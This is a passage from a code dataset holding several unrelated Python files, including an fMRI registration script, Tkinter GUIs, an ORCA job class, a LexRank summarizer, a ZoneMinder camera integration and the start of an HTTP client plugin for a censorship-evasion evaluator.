8\n \n if len(method.split('.')) > 1:\n if method.split('.')[1] == 'invert': \n inverter = pe.Node(util.Function(function=invert_image), name='inverter') \n wf.connect(inverter, 'out', wf.get_node('inputspec'), 'EPI_space_file')\n else:\n wf.inputs.inputspec.EPI_space_file = source_file\n \n wf.inputs.inputspec.T1_file = '/data/derivatives/epi_to_T1.3depi/sub-012/anat/sub-012_acq-3DEPI_T1w_ras_masked.nii.gz'\n \n ds_transformed = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder, \n suffix='bold_epi2t1w_epi'), \n name='ds_transformed',)\n ds_transformed.inputs.source_file = source_file \n wf.connect(wf.get_node(\"outputspec\"), 'transformed_EPI_space_file', ds_transformed, 'in_file')\n \n ds_transforms = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder,\n suffix='bold_epi2t1w_epi'), \n name='ds_transforms') \n ds_transforms.inputs.source_file = source_file \n wf.connect(wf.get_node(\"outputspec\"), 'EPI_T1_matrix_file', ds_transforms, 'in_file') \n \n \n from nipype.interfaces import ants\n measure_similarity = pe.Node(ants.MeasureImageSimilarity(dimension=3,\n metric='CC',\n metric_weight=1.0,\n radius_or_number_of_bins=4,\n sampling_strategy='Regular',\n sampling_percentage=1.0,\n fixed_image_mask='/data/derivatives/preproc_anat/fmriprep/sub-012/anat/sub-012_acq-highres_T1w_brainmask.nii.gz',\n fixed_image='/data/derivatives/preproc_anat/fmriprep/sub-012/anat/sub-012_acq-highres_T1w_preproc.nii.gz'),\n name='measure_similarity')\n wf.connect(wf.get_node(\"outputspec\"), 'transformed_EPI_space_file', measure_similarity, 'moving_image')\n \n \n json_similarity = pe.Node(nio.JSONFileSink(input_names=['similarity', 'method']),\n name='json_similarity')\n \n json_similarity.inputs.method = method\n wf.connect(measure_similarity, 'similarity', json_similarity, 'similarity')\n \n ds_similarity = pe.Node(spynoza.io.bids.DerivativesDataSink(base_directory=derivatives_folder,\n suffix='similarity'),\n name='ds_similarity')\n ds_similarity.inputs.source_file = source_file \n wf.connect(json_similarity, 'json_measure', ds_similarity, 'in_file')\n \n \n \n wf.run()\n","sub_path":"src/scripts/test_registration_t1w_epi.py","file_name":"test_registration_t1w_epi.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403765591","text":"from tkinter import *\n\n\nroot = Tk()\n\nroot.title(\"My First Gui\")\n\n'''display=Entry(root,bd=20,justify=\"right\",font=(\"Ariel\",12))\ndisplay.grid(row=0,columnspan=4)\nbtn7=Button(root,text=\"7\",font=(\"Ariel\",12),bd=15).grid(row=1,column=0)\nbtn8=Button(root,text=\"8\",font=(\"Ariel\",12),bd=15).grid(row=1,column=1)\nbtn9=Button(root,text=\"9\",font=(\"Ariel\",12),bd=15).grid(row=1,column=2)\nbtn_add=Button(root,text=\"+\",font=(\"Ariel\",12),bd=15).grid(row=1,column=3)\n\n'''\ntxt=Entry(root,bd=12,font=(\"ARIEL\",16,\"bold\"))\ntxt.grid(row=0,columnspan=3)\nbtn=Button(root,text=\"7\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn.grid(row=1,column=0)\nbtn1=Button(root,text=\"8\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn1.grid(row=1,column=1)\nbtn2=Button(root,text=\"9\",fg=\"red\",bg=\"yellow\",font=(\"ARIEL\",14,\"bold\"),bd=6)\nbtn2.grid(row=1,column=2)\nroot.geometry(\"400x500+400+200\")\n#root.resizable(0,0)\nmainloop()","sub_path":"calcigui.py","file_name":"calcigui.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132245092","text":"from __future__ import unicode_literals\n\nfrom .basejob import SingleJob\nfrom .common import string\nfrom .settings import Settings\n\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\n\n# ======================<>===========================\n\n\nclass ORCAJob(SingleJob):\n \"\"\"\n A class representing a single computational job with ORCA\n `Orca `\n todo:\n * print molecule in internal coordinates\n * print xyz including different basis set\n \"\"\"\n\n def get_input(self):\n \"\"\"\n Transform all contents of ``input`` branch of ``settings``\n into string with blocks, subblocks, keys and values. The branch\n self.settings.input.main corresponds to the lines starting with\n the special character ! in the Orca input.\n \n Orca *end* keyword is mandatory for only a subset of sections,\n For instance the following orca input shows the keywords *methods*\n and *basis* use of end.\n\n ! UKS B3LYP/G SV(P) SV/J TightSCF Direct Grid3 FinalGrid4 \n\n %method SpecialGridAtoms 26\n SpecialGridIntAcc 7\n end\n %basis NewGTO 26 \"CP(PPP)\" end\n NewAuxGTO 26 \"TZV/J\" end\n end \n \n In order to specify when the *end* keyword must be used,\n the following syntasis can be used.\n\n \n job = Orca(molecule=Molecule())\n job.settings.input.main = \"UKS B3LYP/G SV(P) SV/J TightSCF Direct Grid3 FinalGrid4\"\n job.settings.input.method.SpecialGridAtoms = 26\n job.settings.input.method.SpecialGridIntAcc = 7\n\n job.settings.input.basis.NewGTO._end = \"26 \\\"CP(PPP)\\\"\"\n job.settings.input.basis.NewAuxGTO._end = \"26 \\\"TZV/J\\\"\"\n \"\"\"\n def get_end(s):\n if (not isinstance(s, Settings)) or ('_end' not in s):\n return s\n else:\n return '{} end'.format(s['_end'])\n\n def pretty_print_inner(s, indent):\n inp = ''\n for i, (key, value) in enumerate(s.items()):\n end = get_end(value)\n if i == 0:\n inp += ' {} {}\\n'.format(key, end)\n else:\n inp += '{}{} {}\\n'.format(indent, key, end)\n return inp\n\n def pretty_print_orca(s, indent=''):\n inp = ''\n if isinstance(s, Settings):\n for k, v in s.items():\n if k == 'main':\n inp += '! {}\\n\\n'.format(pretty_print_orca(v, indent))\n else:\n indent2 = (len(k) + 2) * ' '\n if not isinstance(v, Settings):\n block = pretty_print_orca(v)\n else:\n block = pretty_print_inner(v, indent2)\n inp += '%{}{}{}end\\n\\n'.format(k, block, indent2)\n elif isinstance(s, list):\n for elem in s:\n inp += '{}'.format(elem)\n else:\n inp += '{}'.format(s)\n return inp\n\n inp = pretty_print_orca(self.settings.input)\n inp_mol = self.print_molecule()\n\n return inp + inp_mol\n\n def print_molecule(self):\n \"\"\"\n pretty print a molecule in the Orca format.\n \"\"\"\n mol = self.molecule\n if mol:\n if 'charge' in mol.properties and isinstance(mol.properties.charge, int):\n charge = mol.properties.charge\n else:\n charge = 0\n if 'multiplicity' in mol.properties and isinstance(mol.properties.multiplicity, int):\n multi = mol.properties.multiplicity\n else:\n multi = 1\n xyz = ''.join(at.str(symbol=True, space=11, decimal=5) for at in mol.atoms)\n return '* xyz {} {}\\n{}*\\n\\n'.format(charge, multi, xyz)\n else:\n return ''\n\n def get_runscript(self):\n \"\"\"\n Running orca is straightforward, simply:\n */absolute/path/to/orca myinput.inp*\n \"\"\"\n path = string(subprocess.check_output(['which', 'orca'])).rstrip()\n return '{} {}'.format(path, self._filename('inp'))\n\n def check(self):\n \"\"\"\n Look for the normal termination signal in Orca output\n \"\"\"\n s = self.results.grep_output(\"ORCA TERMINATED NORMALLY\")\n return len(s) > 0\n\n","sub_path":"plams_original/orcajob.py","file_name":"orcajob.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"410665325","text":"#\n# Copyright (C) 2018 ETH Zurich and University of Bologna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)\n\nimport json\nimport plptree\nimport os\nfrom collections import OrderedDict\n\n\nclass Interface(object):\n\n def __init__(self, comp, name):\n self.__dict__['name'] = name\n self.__dict__['comp'] = comp\n\n\n\nclass Component(object):\n\n def __init__(self, **kwargs):\n self.__dict__['is_empty'] = False\n self.__dict__['is_tb_comp'] = False\n\n self.__dict__['_Component__comps'] = OrderedDict()\n self.__dict__['_Component__master_itfs'] = OrderedDict()\n self.__dict__['_Component__slave_itfs'] = OrderedDict()\n\n if len(kwargs) != 0:\n self.__dict__['_Component__properties'] = kwargs.copy()\n\n def get_master_itfs(self):\n return self.__dict__['_Component__master_itfs']\n\n def get_slave_itfs(self):\n return self.__dict__['_Component__slave_itfs']\n\n def set_name(self, name):\n self.__dict__['_Component__name'] = name\n\n def get_name(self):\n return self.__dict__.get('_Component__name')\n\n def get_json_config(self, configs=None, expand=False):\n if not expand:\n return json.dumps(self.gen(), indent=' ')\n\n\n config = plptree.get_config_tree_from_dict(self.gen(), path=configs)\n return config.get_string()\n\n\n def __setattr__(self, name, value):\n if type(value) == Interface:\n if self.__dict__['_Component__master_itfs'].get(name) is None:\n self.__dict__['_Component__master_itfs'][name] = []\n\n self.__dict__['_Component__master_itfs'][name].append(value)\n else:\n self.__dict__['_Component__comps'][name] = value\n self.__dict__[name] = value\n value.set_name(name)\n\n def __getattr__(self, name):\n if self.__dict__.get(name) is None:\n itf = Interface(self, name)\n self.__dict__['_Component__slave_itfs'][name] = itf\n return itf\n else:\n return self.__dict__[name]\n\n def get_property(self, name):\n return self.__dict__.get('_Component__properties').get(name)\n\n def set_property(self, name, value):\n if self.__dict__.get('_Component__properties') is None:\n self.__dict__['_Component__properties'] = OrderedDict()\n self.__dict__.get('_Component__properties')[name] = value\n\n def get_comp(self, name):\n comp = self.__dict__.get('_Component__vp_comps').get(name)\n if comp is None:\n comp = self.__dict__.get('_Component__tb_comps').get(name)\n return comp\n\n def gen(self):\n result = OrderedDict()\n\n properties = self.__dict__.get('_Component__properties')\n if properties is not None:\n for key, value in properties.items():\n result[key] = value\n\n comps = list(self.__dict__['_Component__comps'])\n if len(comps) != 0:\n vp_comps = []\n tb_comps = []\n for comp_name in comps:\n comp = self.__dict__['_Component__comps'].get(comp_name)\n if comp.__dict__.get('is_empty'):\n continue\n\n if comp.__dict__.get('is_tb_comp'):\n tb_comps.append(comp_name)\n else:\n vp_comps.append(comp_name)\n\n if len(vp_comps) != 0:\n result['vp_comps'] = vp_comps\n if len(tb_comps) != 0:\n result['tb_comps'] = tb_comps\n\n vp_bindings = []\n tb_bindings = []\n\n ports = list(self.get_master_itfs().keys()) + list(self.get_slave_itfs().keys())\n if len(ports) != 0:\n result['vp_ports'] = ports \n\n for itf_name, slave_itf_list in self.get_master_itfs().items():\n for slave_itf in slave_itf_list:\n slave_name = slave_itf.comp.get_name()\n\n if self.__dict__.get('_Component__comps').get(slave_name) != slave_itf.comp:\n continue\n binding = [\n \"self->%s\" % (itf_name),\n \"%s->%s\" % (slave_name, slave_itf.name)\n ]\n\n if slave_itf.comp.__dict__.get('is_tb_comp') or self.__dict__.get('is_tb_comp'):\n tb_bindings.append(binding)\n else:\n vp_bindings.append(binding)\n\n for comp_name, comp in self.__dict__['_Component__comps'].items():\n for itf_name, slave_itf_name in comp.get_master_itfs().items():\n for slave_itf in slave_itf_name:\n if slave_itf.comp == self:\n slave_name = 'self'\n else:\n slave_name = slave_itf.comp.get_name()\n\n if self.__dict__.get('_Component__comps').get(slave_name) != slave_itf.comp:\n continue\n\n binding = [\n \"%s->%s\" % (comp_name, itf_name),\n \"%s->%s\" % (slave_name, slave_itf.name)\n ]\n\n if slave_itf.comp.__dict__.get('is_tb_comp') or comp.__dict__.get('is_tb_comp'):\n tb_bindings.append(binding)\n else:\n vp_bindings.append(binding)\n\n\n if len(vp_bindings) != 0:\n result['vp_bindings'] = vp_bindings\n\n if len(tb_bindings) != 0:\n result['tb_bindings'] = tb_bindings\n\n for name, comp in self.__dict__['_Component__comps'].items():\n result[name] = comp.gen()\n\n return result\n\n\n\nclass Tb_Component(Component):\n def __init__(self, **kwargs):\n super(Tb_Component, self).__init__(**kwargs)\n\n self.__dict__['is_tb_comp'] = True\n\nclass Empty_Component(Component):\n def __init__(self, **kwargs):\n super(Empty_Component, self).__init__(**kwargs)\n\n self.__dict__['is_empty'] = True\n","sub_path":"generators/comp_gen.py","file_name":"comp_gen.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513622342","text":"\"\"\"Lex Rank.\"\"\"\nfrom lex_rank_utils import LexRankCompute\nfrom utils import preprocess\nimport itertools\nimport numpy as np\nimport math\n\n\ndef cosine(A, B):\n \"\"\"Cosine Similarity.\"\"\"\n A = np.array(A)\n B = np.array(B)\n dot = (A*B).sum()\n mod_A = math.sqrt((A * A).sum())\n mod_B = math.sqrt((B * B).sum())\n\n return dot/(mod_A * mod_B)\n\n\nclass LexRank():\n \"\"\"Class for Lex Rank.\"\"\"\n\n def __init__(self, name):\n \"\"\"Init.\"\"\"\n self.content = open(name, 'r').read().split('.')\n self.sent = dict()\n\n def lex_rank(self):\n \"\"\"Do LexRank.\"\"\"\n tokens_sent = list()\n raw_sent = dict()\n for i, each in enumerate(self.content):\n sent = preprocess(each)\n tokens_sent.append(sent)\n raw_sent[i] = each\n\n all_tokens = itertools.chain.from_iterable(tokens_sent)\n word_to_id = {token: idx for idx, token in enumerate(set(all_tokens))}\n\n tokens_ids = []\n for sent in tokens_sent:\n vec = [0 for i in range(len(word_to_id))]\n for tok in sent:\n vec[word_to_id[tok]] = 1\n tokens_ids.append(vec)\n\n lmatrix = np.zeros((len(tokens_ids), len(tokens_ids)), dtype=np.float)\n\n for i in range(len(tokens_ids)):\n for j in range(len(tokens_ids)):\n sent1 = tokens_ids[i]\n sent2 = tokens_ids[j]\n if i != j:\n lmatrix[i][j] = cosine(sent1, sent2)\n\n P = LexRankCompute(lmatrix.shape[0], lmatrix)\n P.iterate(1)\n\n sorte = [i[0] for i in sorted(enumerate(P.page_scores), key=lambda x:x[1], reverse=True)]\n print(P.page_scores, sorte)\n\n text = raw_sent[sorte[0]].strip() + raw_sent[sorte[1]].strip() + '\\n'\n\n return text\n\n\ndef main():\n \"\"\"Main.\"\"\"\n l = LexRank('text.txt')\n summary = l.lex_rank()\n print(summary)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lex_rank/lexrank.py","file_name":"lexrank.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"636315932","text":"#!/usr/bin/env python3\n# Script for printing and counting presence of specific JSON fields from given file\nimport json\nimport argparse\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\", help=\"the input file\")\nparser.add_argument(\"fieldname\", help=\"Field name (root level)\")\nparser.add_argument(\"-s\", \"--silent\", help=\"Don't print the found fields\", action=\"store_true\")\nargs = parser.parse_args()\nif not Path(args.input).is_file():\n msg = \"{0} is not an existing file\".format(args.input)\n raise argparse.ArgumentTypeError(msg)\n\ninput_file = Path(args.input)\n\ntotal_count = 0\npresent_count = 0\nfor element in input_file.open():\n total_count += 1\n json_element = json.loads(element)\n try:\n # print JSON element(s), if present\n if not args.silent:\n print(str(json_element[args.fieldname]))\n present_count += 1\n except KeyError:\n pass\n# print statistics\nprint('Given field: ' + args.fieldname)\nprint('Given field present in: ' + str(present_count) + '/' + str(total_count) + 'total')\nprint('Given field missing: ' + str(total_count - present_count))\n","sub_path":"debugscripts/analyse-json-file.py","file_name":"analyse-json-file.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"468689408","text":"class Home:\n\n def __init__(self, new_area, new_address):\n self.area = new_area\n self.left_area = new_area\n self.address = new_address\n self.contained_items = [] # 用来保存家具\n\n def __str__(self):\n\n item_names = []\n for temp in self.contained_items:\n item_names.append(temp.name)\n\n return \"房子的总面积是:%d, 剩余可用面积是:%d, 位置是:%s, 物品有:%s\" % (self.area, self.left_area, self.address, str(item_names))\n\n def add_item(self, new_item):\n if self.left_area > new_item.area:\n self.contained_items.append(new_item)\n self.left_area -= new_item.area\n else:\n print(\"物品过大,放不下,请重新购买\")\n\n\nclass Bed:\n\n def __init__(self, new_name, new_area):\n self.name = new_name\n self.area = new_area\n\n\nhome1 = Home(130, \"北京市 朝阳区 长安街 666号\")\nprint(home1)\n\nbed1 = Bed(\"双人床\", 4)\n\nhome1.add_item(bed1)\n\nprint(home1)\n\nbed2 = Bed(\"婴儿床\", 1.5)\n\nhome1.add_item(bed2)\n\nprint(home1)\n\nbed3 = Bed(\"多人床\", 180)\n\nhome1.add_item(bed3)\n\nprint(home1)\n","sub_path":"课件/python10/12-应用:存放家具.py","file_name":"12-应用:存放家具.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198958034","text":"\n\n#calss header\nclass _BALCONY():\n\tdef __init__(self,): \n\t\tself.name = \"BALCONY\"\n\t\tself.definitions = [u'an area with a wall or bars around it that is joined to the outside wall of a building on an upper level: ', u'an area of seats at an upper level in a theatre: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_balcony.py","file_name":"_balcony.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56763502","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass Main(tk.Frame):\n def __init__(self, root):\n super().__init__(root)\n self.init_main()\n\n def init_main(self):\n labelSplav = tk.Label(root, text='Выберите сплав:')\n labelSplav.pack(side=tk.TOP)\n\n comboSplav = ttk.Combobox(root, values=['бронза', 'латунь', 'оцс', 'припой'], state='readonly')\n comboSplav.pack(side=tk.TOP)\n\n labelMarkaSplava = tk.Label(root, text='Выберите марку сплава:')\n labelMarkaSplava.pack(side=tk.TOP)\n\n comboSplav = ttk.Combobox(root, values=['Л63', 'ЛС59-1'], state='readonly')\n comboSplav.pack(side=tk.TOP)\n\n self.tree = ttk.Treeview(self, columns=('elements', 'cu', 'zn'), height=1, show='headings')\n\n self.tree.column('elements', width=150, anchor=tk.CENTER)\n self.tree.column('cu', width=150, anchor=tk.CENTER)\n self.tree.column('zn', width=150, anchor=tk.CENTER)\n\n self.tree.heading('elements', text='Химические элементы')\n self.tree.heading('cu', text='Cu')\n self.tree.heading('zn', text='Zn')\n\n self.tree.pack()\n\nif __name__ == '__main__':\n root = tk.Tk()\n app = Main(root)\n app.pack()\n root.title('Расчет металлов')\n root.geometry('800x450+300+200')\n root.resizable(False, False)\n root.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479944931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 7 14:01:54 2017\n\n@author: Nakanishi\n\"\"\"\nfrom multiprocessing import Pool\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom neuron5 import Neuron\n\ndef plot(process):\n if process == 0:\n neu = Neuron(0.01, 120, 1, 8, -65, 100)\n for i in range(0, int(neu.cycle)-1):\n neu.propagation()\n t = np.arange(0, neu.simtime, neu.timestep)\n plt.plot(t, neu.vin[0])\n plt.title(\"noise = 100\")\n plt.savefig(\"noise is 100.png\")\n\n elif process == 1:\n neu = Neuron(0.01, 120, 1, 8, -65, 200)\n for i in range(0, int(neu.cycle)-1):\n neu.propagation()\n t = np.arange(0, neu.simtime, neu.timestep)\n plt.plot(t, neu.vin[0])\n plt.title(\"noise = 200\")\n plt.savefig(\"noise is 200.png\")\n\n elif process == 2:\n neu = Neuron(0.01, 120, 1, 8, -65, 300)\n for i in range(0, int(neu.cycle)-1):\n neu.propagation()\n t = np.arange(0, neu.simtime, neu.timestep)\n plt.plot(t, neu.vin[0])\n plt.title(\"noise = 300\")\n plt.savefig(\"noise is 300.png\")\n\n elif process == 3:\n neu = Neuron(0.01, 120, 1, 8, -65, 400)\n for i in range(0, int(neu.cycle)-1):\n neu.propagation()\n t = np.arange(0, neu.simtime, neu.timestep)\n plt.plot(t, neu.vin[0])\n plt.title(\"noise = 400\")\n plt.savefig(\"noise is 400.png\")\n\n else:\n print('miss')\n\n\ndef main():\n\n # process = 4  # コア数の指定\n\n process = 4\n p = Pool(process)\n p.map(plot, range(process))\n p.close\n\n\nif __name__=='__main__':\n main()\n","sub_path":"HH-multi/main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462072556","text":"import nltk\n\nfrom models.search_engine import SearchEngine\nfrom models.query import Query\n\n\ndef main():\n stopwords = nltk.corpus.stopwords.words(\"english\")\n lemmatizer = nltk.stem.WordNetLemmatizer()\n search_engine = SearchEngine(\"cs276\", [], lemmatizer)\n while True:\n str_query = input(\"enter your query: \")\n query = Query(str_query.lower(), [], lemmatizer)\n if query.length:\n results = search_engine.search(query)\n for result in results:\n print(result)\n if \"n\" in input(\"retry? (y/n)\").lower():\n break\n else:\n print(\"empty query, please retry\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"24410637","text":"\"\"\" Compiled: 2020-09-18 10:38:54 \"\"\"\n\n#__src_file__ = \"extensions/SalesTrading/./etc/FSalesActivityUtils.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FSalesActivityUtils\n\n (c) Copyright 2014 SunGard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n A collection of utility functions used by Sales Activity.\n-------------------------------------------------------------------------------------------------------\"\"\"\n\nimport math\nimport datetime\nimport acm\nimport FSheetUtils\n\ndef double(number):\n value = acm.GetFunction('double', 1)(number)\n if math.isnan(value):\n return 0\n return value\n \ndef FXRateIsValid(ins):\n try:\n curr1 = ins.Currency()\n curr2 = ins.Underlying().Currency()\n pairName = '/'.join((curr1.Name(), curr2.Name()))\n return bool(acm.FCurrencyPair.Select01('name=%s' % pairName, None))\n except AttributeError:\n return False\n\ndef FXRateLabel(ins):\n try:\n curr1 = ins.Currency()\n curr2 = ins.Underlying().Currency()\n return '/'.join((curr1.Name(), curr2.Name()))\n except Exception:\n return ''\n\ndef FXRateValue(ins, fxRate):\n if FXRateIsValid(ins):\n try:\n return 1/fxRate\n except Exception:\n return 0.0\n return fxRate\n \ndef GetFXRateFormatted(salesActivity):\n return FXRateValue(\n salesActivity.Instrument(),\n salesActivity.FXRate()\n )\n \ndef SetFXRateFormatted(salesActivity, fxRate):\n fxRateValue = FXRateValue(salesActivity.Instrument(), fxRate)\n salesActivity.FXRate(fxRateValue)\n \ndef GetEvaluator(obj, attr):\n ctx = acm.GetDefaultContext()\n tag = acm.GetGlobalEBTag()\n return acm.GetCalculatedValueFromString(\n obj, ctx, attr, tag)\n\ndef GetCalculatedValue(obj, attr):\n try:\n return GetEvaluator(obj, attr).Value()\n except RuntimeError:\n return 0\n \ndef GetMarketMakingValue(orderBook, columnId):\n try:\n ctx = acm.GetDefaultContext()\n quoteCtx = acm.MarketMaking.CreateQuoteContext(ctx)\n quoteData = quoteCtx.Insert(acm.FQuoteController(orderBook))\n value = quoteData.GetDataSource(columnId, 0).Get()\n quoteCtx.Clear()\n return value\n except RuntimeError:\n return 0\n \ndef ProposedBidPrice(ins):\n try:\n orderbook = FSheetUtils.OrderBook(ins)\n if orderbook is None:\n return double(GetCalculatedValue(ins, 'pricingPriceFeed'\n ).BestBidPrice().Get())\n return GetMarketMakingValue(orderbook, 'Proposed Bid Price Raw')\n except AttributeError:\n return 0\n \ndef ProposedAskPrice(ins):\n try:\n orderbook = FSheetUtils.OrderBook(ins)\n if orderbook is None:\n return double(GetCalculatedValue(ins, 'pricingPriceFeed'\n ).BestAskPrice().Get())\n return GetMarketMakingValue(orderbook, 'Proposed Bid Price Raw')\n except AttributeError:\n return 0\n \ndef IsValidNumber(number):\n try:\n if number.IsKindOf(acm.FDenominatedValue):\n number = double(number)\n except AttributeError:\n pass\n return (type(number) in (int, float, long) and\n not math.isnan(number) and\n not math.isinf(number))\n \ndef IndexedDiary(diary):\n def IsValidKey(d):\n try:\n datetime.datetime.strptime(d, \n '%Y-%m-%d %H:%M:%S')\n return True\n except ValueError:\n return False\n\n d = {}\n key = None\n try:\n for line in diary.Text().splitlines():\n if line: \n _key = line[:19]\n if IsValidKey(_key):\n key = _key\n d[key] = []\n elif key in d:\n d[key].append(line)\n except AttributeError:\n pass\n\n return d\n \ndef LastDiaryEntry(diary):\n try:\n d = IndexedDiary(diary)\n return ' '.join(d[sorted(d.keys())[-1]])\n except IndexError:\n pass\n","sub_path":"Extensions/_sales_trading_py/FPythonCode/FSalesActivityUtils.py","file_name":"FSalesActivityUtils.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579067746","text":"\"\"\"Support for ZoneMinder camera streaming.\"\"\"\nimport logging\nfrom typing import Callable, List, Optional\n\nfrom zoneminder.monitor import Monitor\n\nfrom homeassistant.components.mjpeg.camera import (\n CONF_MJPEG_URL,\n CONF_STILL_IMAGE_URL,\n MjpegCamera,\n filter_urllib3_logging,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_NAME, CONF_VERIFY_SSL\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import Entity\n\nfrom .common import get_client_from_data\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the ZoneMinder cameras.\"\"\"\n filter_urllib3_logging()\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: Callable[[List[Entity], Optional[bool]], None],\n) -> None:\n \"\"\"Set up the sensor config entry.\"\"\"\n zm_client = get_client_from_data(hass, config_entry.unique_id)\n\n async_add_entities(\n [\n ZoneMinderCamera(monitor, zm_client.verify_ssl, config_entry)\n for monitor in await hass.async_add_job(zm_client.get_monitors)\n ]\n )\n\n\nclass ZoneMinderCamera(MjpegCamera):\n \"\"\"Representation of a ZoneMinder Monitor Stream.\"\"\"\n\n def __init__(self, monitor: Monitor, verify_ssl: bool, config_entry: ConfigEntry):\n \"\"\"Initialize as a subclass of MjpegCamera.\"\"\"\n device_info = {\n CONF_NAME: monitor.name,\n CONF_MJPEG_URL: monitor.mjpeg_image_url,\n CONF_STILL_IMAGE_URL: monitor.still_image_url,\n CONF_VERIFY_SSL: verify_ssl,\n }\n super().__init__(device_info)\n self._is_recording = None\n self._is_available = None\n self._monitor = monitor\n self._config_entry = config_entry\n\n @property\n def unique_id(self) -> Optional[str]:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self._config_entry.unique_id}_{self._monitor.id}_camera\"\n\n @property\n def should_poll(self):\n \"\"\"Update the recording state periodically.\"\"\"\n return True\n\n def update(self):\n \"\"\"Update our recording state from the ZM API.\"\"\"\n _LOGGER.debug(\"Updating camera state for monitor %i\", self._monitor.id)\n self._is_recording = self._monitor.is_recording\n self._is_available = self._monitor.is_available\n\n @property\n def is_recording(self):\n \"\"\"Return whether the monitor is in alarm mode.\"\"\"\n return self._is_recording\n\n @property\n def available(self):\n \"\"\"Return True if entity is available.\"\"\"\n return self._is_available\n","sub_path":"homeassistant/components/zoneminder/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216836460","text":"\"\"\"\nRun by the evaluator, tries to make a GET request to a given server\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport random\nimport socket\nimport sys\nimport time\nimport traceback\nimport urllib.request\n\nimport requests\n\nsocket.setdefaulttimeout(1)\n\nimport external_sites\nimport actions.utils\n\nfrom plugins.plugin_client import ClientPlugin\n\nBASEPATH = os.path.dirname(os.path.abspath(__file__))\n\ncorrect_response = \"\"\"\n\n\n\nDirectory listing for /?q=ultrasurf\n\n\n

Directory listing for /?q=ultrasurf

\n
\n
    \n
\n
\n\n\n\"\"\"\n\nclass HTTPClient(ClientPlugin):\n \"\"\"\n Defines the HTTP client.\n \"\"\"\n name = \"http\"\n\n def __init__(self, args):\n \"\"\"\n Initializes the HTTP client.\n \"\"\"\n ClientPlugin.__init__(self)\n self.args = args\n\n @staticmethod\n def get_args(command):\n \"\"\"\n Defines required args for this plugin\n \"\"\"\n super_args = ClientPlugin.get_args(command)\n parser = argparse.ArgumentParser(description='HTTP Client', prog=\"http/client.py\")\n\n parser.add_argument('--host-header', action='store', default=\"\", help='specifies host header for HTTP request')\n parser.add_argument('--injected-http-contains', action='store', default=\"\", help='checks if injected http response contains string')\n\n args, _ = parser.parse_known_args(command)\n args = vars(args)\n\n super_args.update(args)\n return super_args\n\n def run(self, args, logger, engine=None):\n \"\"\"\n Try to make a forbidden GET request to the server.\n \"\"\"\n logger.debug(\"STARTING HTTP CLIENT....\")\n fitness = 0\n url = args.get(\"server\", \"\")\n assert url, \"Cannot launch 